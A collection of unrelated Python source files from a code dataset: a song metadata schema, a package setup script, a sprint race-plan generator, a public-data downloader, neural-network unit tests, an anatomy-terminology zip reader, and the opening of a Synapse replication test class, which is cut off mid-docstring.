from marshmallow import Schema, post_load, fields
from fuocore.schemas import SongSchema
from fuocore.utils import elfhash
SOURCE = 'local'
class EasyMP3MetadataSongSchema(Schema):
"""EasyMP3 metadata"""
url = fields.Str(required=True)
title_list = fields.List(fields.Str(), load_from='title', required=True)
duration = fields.Float(required=True)
artist_name_list = fields.List(fields.Str(), load_from='artist')
album_name_list = fields.List(fields.Str(), load_from='album')
@post_load
def create_song_model(self, data):
title_list = data.get('title_list', [])
title = title_list[0] if title_list else 'Unknown'
artist_name_list = data.get('artist_name_list', [])
album_name_list = data.get('album_name_list', [])
identifier = str(elfhash(base64.b64encode(bytes(data['url'], 'utf-8'))))
song_data = {
'source': SOURCE,
'identifier': identifier,
'title': title,
'duration': data['duration'],
'url': data['url'],
'artists': [{'name': name, 'identifier': name, 'source': SOURCE}
for name in artist_name_list]
}
if album_name_list:
song_data['album'] = {'name': album_name_list[0],
'identifier': album_name_list[0],
'source': SOURCE}
song, _ = SongSchema(strict=True).load(song_data)
return song
| StarcoderdataPython |
1797441 | #! /usr/bin/env python
#coding=utf-8
from setuptools import setup
import linciclient
setup_args = {
'name': "linciclient",
'version': linciclient.__version__,
'description': "linci client tools",
'long_description': "linci client tools for ",
'author': linciclient.__author__,
'author_email': linciclient.__author_email__,
'url': linciclient.__url__,
'license': linciclient.__license__,
'classifiers': [
'Development Status :: 2 - Pre-Alpha',
'Environment :: No Input/Output (Daemon)',
'Environment :: Console',
'Framework :: Uliweb',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Testing',
],
'packages': [
"linciclient",
],
'entry_points' : {
'console_scripts': [
'linci_client_config = linciclient.config:main',
'linci_arti_open = linciclient.artifact.open:main',
'linci_arti_upload = linciclient.artifact.upload:main',
'linci_arti_set_ready = linciclient.artifact.set_ready:main',
'linci_arti_fix = linciclient.artifact.fix:main',
'linci_arti_download = linciclient.artifact.download:main',
'linci_arti_close = linciclient.artifact.close:main',
'linci_worker = linciclient.worker:main',
],
},
}
setup(**setup_args)
| StarcoderdataPython |
1714725 | <reponame>langrenn-sprint/race-service
"""Module for raceplan commands."""
from datetime import date, datetime, time, timedelta
from typing import Any, Dict, List, Tuple, Union
from race_service.models import IndividualSprintRace, Raceplan
async def calculate_raceplan_individual_sprint( # noqa: C901
event: dict,
format_configuration: dict,
raceclasses: List[dict],
) -> Tuple[Raceplan, List[IndividualSprintRace]]:
"""Calculate raceplan for Individual Sprint event."""
# Initialize
raceplan = Raceplan(event_id=event["id"], races=list())
races: List[IndividualSprintRace] = []
# We get the number of contestants in plan from the raceclasses:
raceplan.no_of_contestants = sum(
raceclass["no_of_contestants"] for raceclass in raceclasses
)
# First we prepare the parameters:
# get the time_between_groups as timedelta:
TIME_BETWEEN_GROUPS = timedelta(
hours=time.fromisoformat(format_configuration["time_between_groups"]).hour,
minutes=time.fromisoformat(format_configuration["time_between_groups"]).minute,
seconds=time.fromisoformat(format_configuration["time_between_groups"]).second,
)
TIME_BETWEEN_HEATS = timedelta(
hours=time.fromisoformat(format_configuration["time_between_heats"]).hour,
minutes=time.fromisoformat(format_configuration["time_between_heats"]).minute,
seconds=time.fromisoformat(format_configuration["time_between_heats"]).second,
)
TIME_BETWEEN_ROUNDS = timedelta(
hours=time.fromisoformat(format_configuration["time_between_rounds"]).hour,
minutes=time.fromisoformat(format_configuration["time_between_rounds"]).minute,
seconds=time.fromisoformat(format_configuration["time_between_rounds"]).second,
)
# get the first start_time from the event:
start_time = datetime.combine(
date.fromisoformat(event["date_of_event"]),
time.fromisoformat(event["time_of_event"]),
)
# Sort the raceclasses on group and order:
raceclasses_sorted = sorted(raceclasses, key=lambda k: (k["group"], k["order"]))
# We need to group the raceclasses by group:
d: Dict[int, list] = {}
for raceclass in raceclasses_sorted:
d.setdefault(raceclass["group"], []).append(raceclass)
raceclasses_grouped = list(d.values())
# Generate the races, group by group, based on configuration and number of contestants
order = 1
for raceclasses in raceclasses_grouped:
# Initalize ConfigMatrix pr group:
ConfigMatrix.initialize(format_configuration, raceclasses)
for round in ConfigMatrix.get_rounds():
for raceclass in raceclasses:
for index in reversed(ConfigMatrix.get_race_indexes(raceclass, round)):
for heat in range(
1, ConfigMatrix.get_no_of_heats(raceclass, round, index) + 1
):
race = IndividualSprintRace(
id="",
order=order,
raceclass=raceclass["name"],
round=round,
index="" if round in ["Q", "R1", "R2"] else index,
heat=heat,
start_time=start_time,
max_no_of_contestants=format_configuration[
"max_no_of_contestants_in_race"
],
no_of_contestants=0,
rule={}
if round in ["F", "R2"]
else ConfigMatrix.get_rule_from_to(raceclass, round, index),
event_id=event["id"],
raceplan_id="",
start_entries=[],
results={},
)
order += 1
# Calculate start_time for next heat:
start_time = start_time + TIME_BETWEEN_HEATS
# Add the race to the raceplan:
races.append(race)
# Calculate start_time for next round:
if round in ConfigMatrix.get_rounds_in_raceclass(raceclass):
start_time = start_time - TIME_BETWEEN_HEATS + TIME_BETWEEN_ROUNDS
# Calculate start_time for next group:
start_time = start_time + TIME_BETWEEN_GROUPS
# We need to calculate the number of contestants pr race:
for raceclasses in raceclasses_grouped:
for raceclass in raceclasses:
if raceclass["ranking"]:
await _calculate_number_of_contestants_pr_race_in_raceclass_ranked(
raceclass, races
)
else:
await _calculate_number_of_contestants_pr_race_in_raceclass_non_ranked(
raceclass, races
)
return raceplan, races
async def _calculate_number_of_contestants_pr_race_in_raceclass_ranked( # noqa: C901
raceclass: dict, races: List[IndividualSprintRace]
) -> None:
"""Calculate number of contestants pr race in given raceclass."""
no_of_Qs = len(
[
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "Q"
]
)
no_of_SAs = len(
[
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "S"
and race.index == "A"
]
)
no_of_SCs = len(
[
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "S"
and race.index == "C"
]
)
no_of_contestants_to_Qs = raceclass["no_of_contestants"]
no_of_contestants_to_SAs = 0
no_of_contestants_to_SCs = 0
no_of_contestants_to_FA = 0
no_of_contestants_to_FB = 0
no_of_contestants_to_FC = 0
# Calculate number of contestants pr heat in Q:
for race in [
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "Q"
]:
# First we calculate no of contestants in each Q race:
# We need to "smooth" the contestants across the heats:
quotient, remainder = divmod(
no_of_contestants_to_Qs,
no_of_Qs,
)
if race.heat <= remainder:
race.no_of_contestants = quotient + 1
else:
race.no_of_contestants = quotient
# If there is to be a round "S" or "F", calculate number of contestants in SA, SC and FC:
for race in [
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "Q"
]:
if "S" in race.rule:
# Then, for each race in round Q, some goes to SA:
no_of_contestants_to_SAs += race.rule["S"]["A"] # type: ignore
# rest to SC:
if race.rule["S"]["C"] != 0:
no_of_contestants_to_SCs += race.no_of_contestants - race.rule["S"]["A"] # type: ignore
# or the rest may in some cases go directly to FC:
if "F" in race.rule:
if "C" in race.rule["F"]:
no_of_contestants_to_FC += race.no_of_contestants - race.rule["S"]["A"] # type: ignore
if "A" in race.rule["F"]:
if race.rule["F"]["A"] > race.no_of_contestants:
no_of_contestants_to_FA = race.no_of_contestants
else:
no_of_contestants_to_FA += race.rule["F"]["A"] # type: ignore
# rest to FB:
if "B" in race.rule["F"]:
if race.rule["F"]["B"] < float("inf"):
no_of_contestants_to_FB += race.rule["F"]["B"] # type: ignore
else:
no_of_contestants_to_FB += race.no_of_contestants - race.rule["F"]["A"] # type: ignore
# Calculate number of contestants pr heat in SA:
for race in [
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "S"
and race.index == "A"
]:
quotient, remainder = divmod(
no_of_contestants_to_SAs,
no_of_SAs,
)
if race.heat <= remainder:
race.no_of_contestants = quotient + 1
else:
race.no_of_contestants = quotient
# Calculate number of contestants pr heat in SC:
for race in [
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "S"
and race.index == "C"
]:
quotient, remainder = divmod(
no_of_contestants_to_SCs,
no_of_SCs,
)
if race.heat <= remainder:
race.no_of_contestants = quotient + 1
else:
race.no_of_contestants = quotient
# Calculate number of contestants in FA, FB and FC:
for race in [
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "S"
]:
if "F" in race.rule:
if "A" in race.rule["F"]:
no_of_contestants_to_FA += race.rule["F"]["A"] # type: ignore
if "B" in race.rule["F"]:
if race.rule["F"]["B"] < float("inf"):
no_of_contestants_to_FB += race.rule["F"]["B"] # type: ignore
else:
no_of_contestants_to_FB += race.no_of_contestants - race.rule["F"]["A"] # type: ignore
if "C" in race.rule["F"]:
no_of_contestants_to_FC += race.rule["F"]["C"] # type: ignore
# Calculate number of contestants pr heat in FA:
for race in [
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "F"
and race.index == "A"
]:
# There will always be only on FA, simplifying:
race.no_of_contestants = no_of_contestants_to_FA
# Calculate number of contestants pr heat in FB:
for race in [
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "F"
and race.index == "B"
]:
# There will always be only on FB, simplifying:
race.no_of_contestants = no_of_contestants_to_FB
# Calculate number of contestants pr heat in FC:
for race in [
race
for race in races
if race.raceclass == raceclass["name"]
and race.round == "F"
and race.index == "C"
]:
# There will always be only on FC, simplifying:
race.no_of_contestants = no_of_contestants_to_FC
async def _calculate_number_of_contestants_pr_race_in_raceclass_non_ranked( # noqa: C901
raceclass: dict, races: List[IndividualSprintRace]
) -> None:
"""Calculate number of contestants pr race in given raceclass."""
no_of_R1s = no_of_R2s = len(
[
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "R1"
]
)
no_of_contestants_to_R1 = no_of_contestants_to_R2 = raceclass["no_of_contestants"]
# Calculate number of contestants pr heat in R1:
for race in [
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "R1"
]:
# First we calculate no of contestants in each Q race:
# We need to "smooth" the contestants across the heats:
quotient, remainder = divmod(
no_of_contestants_to_R1,
no_of_R1s,
)
if race.heat <= remainder:
race.no_of_contestants = quotient + 1
else:
race.no_of_contestants = quotient
# Calculate number of contestants pr heat in R2:
for race in [
race
for race in races
if race.raceclass == raceclass["name"] and race.round == "R2"
]:
# First we calculate no of contestants in each Q race:
# We need to "smooth" the contestants across the heats:
quotient, remainder = divmod(
no_of_contestants_to_R2,
no_of_R2s,
)
if race.heat <= remainder:
race.no_of_contestants = quotient + 1
else:
race.no_of_contestants = quotient
class ConfigMatrix:
"""Class to represent the config matrix."""
ROUNDS: List[str] = []
RANKING: bool = True
MAX_NO_OF_CONTESTANTS_IN_RACECLASS: int
MAX_NO_OF_CONTESTANTS_IN_RACE: int
m: Dict[int, Dict[str, Any]] = {}
@classmethod
def initialize(
cls: Any, format_configuration: Dict, raceclasses_in_group: List[Dict]
) -> None:
"""Initalize parameters based on format-configuration and raceclasses in group."""
if raceclasses_in_group[0]["ranking"]:
ConfigMatrix.RANKING = True
else:
ConfigMatrix.RANKING = False
if ConfigMatrix.RANKING:
ConfigMatrix.ROUNDS = ["Q", "S", "F"]
else:
ConfigMatrix.ROUNDS = ["R1", "R2"]
ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACECLASS = format_configuration[
"max_no_of_contestants_in_raceclass"
]
ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACE = format_configuration[
"max_no_of_contestants_in_race"
]
# Initialize matrix
# TODO: Get this from format-configuration
ALL = ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACE
REST = float("inf")
if ConfigMatrix.RANKING:
# ConfigMatrix for ranked raceclasses:
ConfigMatrix.m[1] = {
"lim_no_contestants": 7,
"rounds": ["Q", "F"],
"no_of_heats": {
"Q": {"A": 1},
"F": {"A": 1, "B": 0, "C": 0},
},
"from_to": {
"Q": {"A": {"F": {"A": ALL, "B": 0}}, "C": {"F": {"C": 0}}},
},
}
ConfigMatrix.m[2] = {
"lim_no_contestants": 16,
"rounds": ["Q", "F"],
"no_of_heats": {
"Q": {"A": 2},
"F": {"A": 1, "B": 1, "C": 0},
},
"from_to": {
"Q": {"A": {"F": {"A": 4, "B": REST}}, "C": {"F": {"C": 0}}},
},
}
ConfigMatrix.m[3] = {
"lim_no_contestants": 24,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 3},
"S": {"A": 2, "C": 0},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 5, "C": 0}, "F": {"C": REST}}},
"S": {"A": {"F": {"A": 4, "B": REST}}, "C": {"F": {"C": 0}}},
},
}
ConfigMatrix.m[4] = {
"lim_no_contestants": 32,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 4},
"S": {"A": 2, "C": 2},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 4, "C": REST}}},
"S": {"A": {"F": {"A": 4, "B": REST}}, "C": {"F": {"C": 4}}},
},
}
ConfigMatrix.m[5] = {
"lim_no_contestants": 40,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 6},
"S": {"A": 4, "C": 2},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 4, "C": REST}}},
"S": {"A": {"F": {"A": 2, "B": 2}}, "C": {"F": {"C": 4}}},
},
}
ConfigMatrix.m[6] = {
"lim_no_contestants": 48,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 6},
"S": {"A": 4, "C": 4},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 4, "C": REST}}},
"S": {"A": {"F": {"A": 2, "B": 2}}, "C": {"F": {"C": 2}}},
},
}
ConfigMatrix.m[7] = {
"lim_no_contestants": 56,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 7},
"S": {"A": 4, "C": 4},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 4, "C": REST}}},
"S": {"A": {"F": {"A": 2, "B": 2}}, "C": {"F": {"C": 2}}},
},
}
ConfigMatrix.m[8] = {
"lim_no_contestants": ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACECLASS,
"rounds": ["Q", "S", "F"],
"no_of_heats": {
"Q": {"A": 8},
"S": {"A": 4, "C": 4},
"F": {"A": 1, "B": 1, "C": 1},
},
"from_to": {
"Q": {"A": {"S": {"A": 4, "C": REST}}},
"S": {"A": {"F": {"A": 2, "B": 2}}, "C": {"F": {"C": 2}}},
},
}
else:
# ConfigMatrix for non ranked raceclasses:
ConfigMatrix.m[1] = {
"lim_no_contestants": 7,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 1},
"R2": {"A": 1},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[2] = {
"lim_no_contestants": 16,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 2},
"R2": {"A": 2},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[3] = {
"lim_no_contestants": 24,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 3},
"R2": {"A": 3},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[4] = {
"lim_no_contestants": 32,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 4},
"R2": {"A": 4},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[5] = {
"lim_no_contestants": 40,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 6},
"R2": {"A": 6},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[6] = {
"lim_no_contestants": 48,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 6},
"R2": {"A": 6},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[7] = {
"lim_no_contestants": 56,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 7},
"R2": {"A": 7},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
ConfigMatrix.m[8] = {
"lim_no_contestants": ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACECLASS,
"rounds": ["R1", "R2"],
"no_of_heats": {
"R1": {"A": 8},
"R2": {"A": 8},
},
"from_to": {
"R1": {"A": {"R2": {"A": REST}}},
},
}
@classmethod
def get_rounds(cls: Any) -> list:
"""Get default rounds."""
return ConfigMatrix.ROUNDS
@classmethod
def get_rounds_in_raceclass(cls: Any, raceclass: dict) -> list:
"""Get actual rounds in raceclass."""
_key = ConfigMatrix._get_key(raceclass["no_of_contestants"])
return ConfigMatrix.m[_key]["rounds"]
@classmethod
def get_no_of_heats(cls: Any, raceclass: dict, round: str, index: str) -> int:
"""Get no of heats pr round and index."""
_key = ConfigMatrix._get_key(raceclass["no_of_contestants"])
return ConfigMatrix.m[_key]["no_of_heats"][round][index]
@classmethod
def get_race_indexes(cls: Any, raceclass: dict, round: str) -> list:
"""Get race indexes pr round."""
_key = ConfigMatrix._get_key(raceclass["no_of_contestants"])
if round not in ConfigMatrix.m[_key]["no_of_heats"]:
return []
return [key for key in ConfigMatrix.m[_key]["no_of_heats"][round]]
@classmethod
def get_rule_from_to(
cls: Any,
raceclass: dict,
from_round: str,
from_index: str,
) -> Dict[str, Dict[str, Union[int, float]]]:
"""Get race rule pr round and index."""
_key = ConfigMatrix._get_key(raceclass["no_of_contestants"])
return ConfigMatrix.m[_key]["from_to"][from_round][from_index]
@classmethod
def _get_key(cls: Any, no_of_contestants: int) -> int:
"""Looks up key of matrix based on no_of_contestants."""
if 1 <= no_of_contestants <= 7:
return 1
elif 7 < no_of_contestants <= 16:
return 2
elif 16 < no_of_contestants <= 24:
return 3
elif 24 < no_of_contestants <= 32:
return 4
elif 32 < no_of_contestants <= 40:
return 5
elif 40 < no_of_contestants <= 48:
return 6
elif 48 < no_of_contestants <= 56:
return 7
elif 56 < no_of_contestants <= ConfigMatrix.MAX_NO_OF_CONTESTANTS_IN_RACECLASS:
return 8
else:
raise ValueError(
f"Unsupported value for no of contestants: {no_of_contestants}"
)
| StarcoderdataPython |
31582 | # pyright: reportUnknownMemberType=false
import logging
import zipfile
from pathlib import Path
from typing import Dict
import requests
from us_pls._config import Config
from us_pls._download.interface import IDownloadService
from us_pls._download.models import DatafileType, DownloadType
from us_pls._logger.interface import ILoggerFactory
from us_pls._persistence.interface import IOnDiskCache
from us_pls._scraper.interface import IScrapingService
BASE_URL = "https://www.imls.gov"
class DownloadService(IDownloadService):
_config: Config
_scraper: IScrapingService
_cache: IOnDiskCache
_logger: logging.Logger
def __init__(
self,
config: Config,
scraper: IScrapingService,
cache: IOnDiskCache,
logger_factory: ILoggerFactory,
) -> None:
self._config = config
self._scraper = scraper
self._cache = cache
self._logger = logger_factory.get_logger(__name__)
def download(self) -> None:
scraped_dict = self._scraper.scrape_files()
scraped_dict_for_year = scraped_dict.get(str(self._config.year))
if scraped_dict_for_year is None:
self._logger.info(f"There is no data for {self._config.year}")
return
self._try_download_resource(
scraped_dict_for_year, "Documentation", DownloadType.Documentation
)
self._try_download_resource(scraped_dict_for_year, "CSV", DownloadType.CsvZip)
self._try_download_resource(
scraped_dict_for_year,
"Data Element Definitions",
DownloadType.DataElementDefinitions,
)
self._clean_up_readme()
def _try_download_resource(
self, scraped_dict: Dict[str, str], resource: str, download_type: DownloadType
) -> None:
route = scraped_dict.get(resource)
self._logger.debug(f"Trying to download {resource}")
if route is None:
self._logger.warning(
f"The resource `{resource}` does not exist for {self._config.year}"
)
return
if self._resource_already_exists(download_type):
self._logger.debug(
f"Resources have already been downloaded for {download_type.value}"
)
return
url = f"{BASE_URL}/{route[1:] if route.startswith('/') else route}"
res = requests.get(url)
if res.status_code != 200:
msg = f"Received a non-200 status code for {url}: {res.status_code}"
self._logger.warning(msg)
return
self._write_content(
download_type,
res.content,
should_unzip=str(download_type.value).endswith(".zip"),
)
def _resource_already_exists(self, download_type: DownloadType) -> bool:
if download_type in [
DownloadType.Documentation,
DownloadType.DataElementDefinitions,
]:
return self._cache.exists(download_type.value)
elif download_type == DownloadType.CsvZip:
return all(
[
self._cache.exists(str(datafile_type.value))
for datafile_type in DatafileType
]
)
return False
def _write_content(
self, download_type: DownloadType, content: bytes, should_unzip: bool = False
) -> None:
self._cache.put(content, download_type.value)
if should_unzip:
zip_path = self._cache.cache_path / Path(download_type.value)
with zipfile.ZipFile(zip_path, "r") as zip_ref:
zip_ref.extractall(self._cache.cache_path)
self._move_content()
self._cache.remove(zip_path)
def _move_content(self) -> None:
for path in self._cache.cache_path.iterdir():
if not path.is_dir():
self._rename(path)
continue
for sub_path in path.iterdir():
self._rename(sub_path)
self._cache.remove(path)
def _rename(self, path: Path) -> None:
new_name: str = path.name
if "_ae_" in path.name.lower() or "ld" in path.name.lower():
new_name = DatafileType.SystemData.value
elif "_outlet_" in path.name.lower() or "out" in path.name.lower():
new_name = DatafileType.OutletData.value
elif "_state_" in path.name.lower() or "sum" in path.name.lower():
new_name = DatafileType.SummaryData.value
elif "readme" in path.name.lower():
new_name = "README.txt"
self._cache.rename(path, Path(new_name))
def _clean_up_readme(self):
self._logger.debug("Cleaning up readme")
readme_text = self._cache.get(
"README.txt",
"txt",
encoding="utf-8",
errors="surrogateescape",
)
if readme_text is None:
self._logger.debug("No readme exists for this year")
return
cleaned_readme_text = "".join([c if ord(c) < 128 else "'" for c in readme_text])
self._cache.put(
bytes(cleaned_readme_text, "utf-8"),
"README.txt",
)
| StarcoderdataPython |
1662578 | <gh_stars>0
import unittest
import numpy as np
import numpy.testing as tst
import splearn as spl
class TestSp(unittest.TestCase):
def setUp(self):
self.data = np.array([[0, 0],
[0, 1],
[1, 0],
[1, 1]], dtype='float64')
self.target = np.array([[0, 0],
[1, 0],
[1, 0],
[0, 1]], dtype='float64')
def test_constructor(self):
randomlayers = np.random.randint(1, 6, 5)
def test_numpy(expected, value):
expected.insert(0, np.zeros(shape=(2, 1)))
expected.append(np.zeros(shape=(2, 1)))
for exp, t in zip(expected, value):
self.assertTrue(exp.shape, t.shape)
# Test constructor with values for layers
neural1 = spl.MLP(9, 5).fit(self.data, self.target)
test_numpy([np.zeros(shape=(9, 1)) for _ in range(5)], neural1._network)
# Test constructor for iterable
neural2 = spl.MLP(randomlayers).fit(self.data, self.target)
test_numpy([np.zeros(shape=(value, 1)) for value in randomlayers], neural2._network)
# Test constructor with integer
neural3 = spl.MLP(9).fit(self.data, self.target)
test_numpy([np.zeros(shape=(9, 1)) for _ in range(9)], neural3._network)
# Test constructor with package
neural4 = spl.MLP(*randomlayers).fit(self.data, self.target)
test_numpy([np.zeros(shape=(value, 1)) for value in randomlayers], neural4._network)
# Testing wrong constructors
with self.assertRaises(TypeError):
wronglayers = np.random.rand(3)
print("Shape wronglayers: {0}".format(wronglayers.shape))
# Test constructor with float
spl.MLP(3.7)
# Test constructor with string
spl.MLP("marcelinho")
# Test constructor with random type
spl.MLP(int)
# Test constructor with array of floats
spl.MLP(wronglayers)
# Test constructor with sequence of floats
spl.MLP(*wronglayers)
def test_fitting(self):
ml = spl.MLP([2])
ml.fit(self.data, self.target)
for layer in ml._network:
print(layer)
spl.MLP(2, 1).fit(self.data, self.target)
def test_foward(self):
weight1 = np.array([[0.3, 0.8, 0.7],
[0.5, 0.6, 0.2]])
weight2 = np.array([[0.1, 0.4, 0.9],
[0.5, 0.3, 0.6]])
first = np.array([[0.0, 0.0]])
target = np.array([[0.0, 0.0]])
testinput = np.array([0.0, 0.0])
neural = spl.MLP(2, 1).fit(first, target)
neural._weights[0] = weight1
neural._weights[1] = weight2
testtarget = np.array([0.33, 0.425]).reshape(2, 1)
tst.assert_almost_equal(neural._forward(testinput), testtarget, decimal=2)
def test_predict(self):
neural = spl.MLP(2, 1).fit(self.data, self.target)
result = neural.predict(np.array([[1, 1]]))
print("prediction:", result)
def test_back(self):
weight1 = np.array([[0.3, 0.8, 0.7],
[0.5, 0.6, 0.2]])
weight2 = np.array([[0.1, 0.4, 0.9],
[0.5, 0.3, 0.6]])
first = np.array([[0.0, 0.0]])
target = np.array([[0.0, 0.0]])
testinput = np.array([0.0, 0.0])
expected = np.array([0.0, 0.0])
# Results from classroom assignment
nweights = [np.array([[0.3, 0.8, 0.71],
[0.5, 0.6, 0.21]]),
np.array([[0.08, 0.38, 0.93],
[0.48, 0.28, 0.65]])]
neural = spl.MLP(2, 1).fit(first, target)
neural._weights[0] = weight1
neural._weights[1] = weight2
neural._forward(testinput)
neural._backprop(expected)
for old, new in zip(neural._weights, nweights):
tst.assert_almost_equal(old, new, decimal=2)
def test_describe(self):
neural = spl.MLP(2, 1).fit(self.data, self.target)
neural.describe()
def test_batch(self):
pass
def test_iris(self):
pass | StarcoderdataPython |
3385027 | import sys
import zipfile
import os, os.path
class TA98ScrapedData(object):
def __init__(self, scraped_zipfile):
self.scraped_zipfile = scraped_zipfile
def __enter__(self):
self.zfile = zipfile.ZipFile(self.scraped_zipfile)
self.ids = ['A'+y for y in
(x[3:].split(' ')[0] for x in self.zfile.namelist() if x.startswith('en')) if y]
self.ids.remove('A02.5.00.000') # bug: this isn't the latin version
return self
def get_html(self, id, lang='en'):
idx = id[1:]
if lang == 'en':
filename = f'en/{idx} Entity TA98 EN.htm'
elif lang == 'la':
filename = f'la/{idx} Latin TA98.htm'
else:
raise ValueError("en or la")
ret = None
with self.zfile.open(filename, 'r') as fp:
ret = fp.read()
return ret
def items_en(self):
for i in self.ids:
yield (i, self.get_html(i, 'en'))
def items_la(self):
for i in self.ids:
yield (i, self.get_html(i, 'la'))
def keys(self):
yield from self.ids
def __exit__(self, type, value, traceback):
self.zfile.close()
if __name__ == '__main__':
def main(scraped_zipfile):
with TAScrapedData(scraped_zipfile) as sinfo:
list(sinfo.items_la())
list(sinfo.items_en())
scraped_zipfile = sys.argv[1]
main(scraped_zipfile) | StarcoderdataPython |
67315 | <gh_stars>0
# Copyright 2019 New Vector Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Any, Dict, List, Optional, Tuple
from twisted.internet.address import IPv4Address
from twisted.internet.protocol import Protocol
from twisted.web.resource import Resource
from synapse.app.generic_worker import GenericWorkerServer
from synapse.http.site import SynapseRequest, SynapseSite
from synapse.replication.http import ReplicationRestResource
from synapse.replication.tcp.client import ReplicationDataHandler
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.protocol import ClientReplicationStreamProtocol
from synapse.replication.tcp.resource import (
ReplicationStreamProtocolFactory,
ServerReplicationStreamProtocol,
)
from synapse.server import HomeServer
from tests import unittest
from tests.server import FakeTransport
try:
import hiredis
except ImportError:
hiredis = None # type: ignore
logger = logging.getLogger(__name__)
class BaseStreamTestCase(unittest.HomeserverTestCase):
"""Base class for tests of the replication streams"""
# hiredis is an optional dependency so we don't want to require it for running
# the tests.
if not hiredis:
skip = "Requires hiredis"
def prepare(self, reactor, clock, hs):
# build a replication server
server_factory = ReplicationStreamProtocolFactory(hs)
self.streamer = hs.get_replication_streamer()
self.server: ServerReplicationStreamProtocol = server_factory.buildProtocol(
IPv4Address("TCP", "127.0.0.1", 0)
)
# Make a new HomeServer object for the worker
self.reactor.lookups["testserv"] = "172.16.31.10"
self.worker_hs = self.setup_test_homeserver(
federation_http_client=None,
homeserver_to_use=GenericWorkerServer,
config=self._get_worker_hs_config(),
reactor=self.reactor,
)
# Since we use sqlite in memory databases we need to make sure the
# databases objects are the same.
self.worker_hs.get_datastores().main.db_pool = hs.get_datastores().main.db_pool
# Normally we'd pass in the handler to `setup_test_homeserver`, which would
# eventually hit "Install @cache_in_self attributes" in tests/utils.py.
# Unfortunately our handler wants a reference to the homeserver. That leaves
# us with a chicken-and-egg problem.
# We can workaround this: create the homeserver first, create the handler
# and bodge it in after the fact. The bodging requires us to know the
# dirty details of how `cache_in_self` works. We politely ask mypy to
# ignore our dirty dealings.
self.test_handler = self._build_replication_data_handler()
self.worker_hs._replication_data_handler = self.test_handler # type: ignore[attr-defined]
repl_handler = ReplicationCommandHandler(self.worker_hs)
self.client = ClientReplicationStreamProtocol(
self.worker_hs,
"client",
"test",
clock,
repl_handler,
)
self._client_transport = None
self._server_transport = None
def create_resource_dict(self) -> Dict[str, Resource]:
d = super().create_resource_dict()
d["/_synapse/replication"] = ReplicationRestResource(self.hs)
return d
def _get_worker_hs_config(self) -> dict:
config = self.default_config()
config["worker_app"] = "synapse.app.generic_worker"
config["worker_replication_host"] = "testserv"
config["worker_replication_http_port"] = "8765"
return config
def _build_replication_data_handler(self):
return TestReplicationDataHandler(self.worker_hs)
def reconnect(self):
if self._client_transport:
self.client.close()
if self._server_transport:
self.server.close()
self._client_transport = FakeTransport(self.server, self.reactor)
self.client.makeConnection(self._client_transport)
self._server_transport = FakeTransport(self.client, self.reactor)
self.server.makeConnection(self._server_transport)
def disconnect(self):
if self._client_transport:
self._client_transport = None
self.client.close()
if self._server_transport:
self._server_transport = None
self.server.close()
def replicate(self):
"""Tell the master side of replication that something has happened, and then
wait for the replication to occur.
"""
self.streamer.on_notifier_poke()
self.pump(0.1)
def handle_http_replication_attempt(self) -> SynapseRequest:
"""Asserts that a connection attempt was made to the master HS on the
HTTP replication port, then proxies it to the master HS object to be
handled.
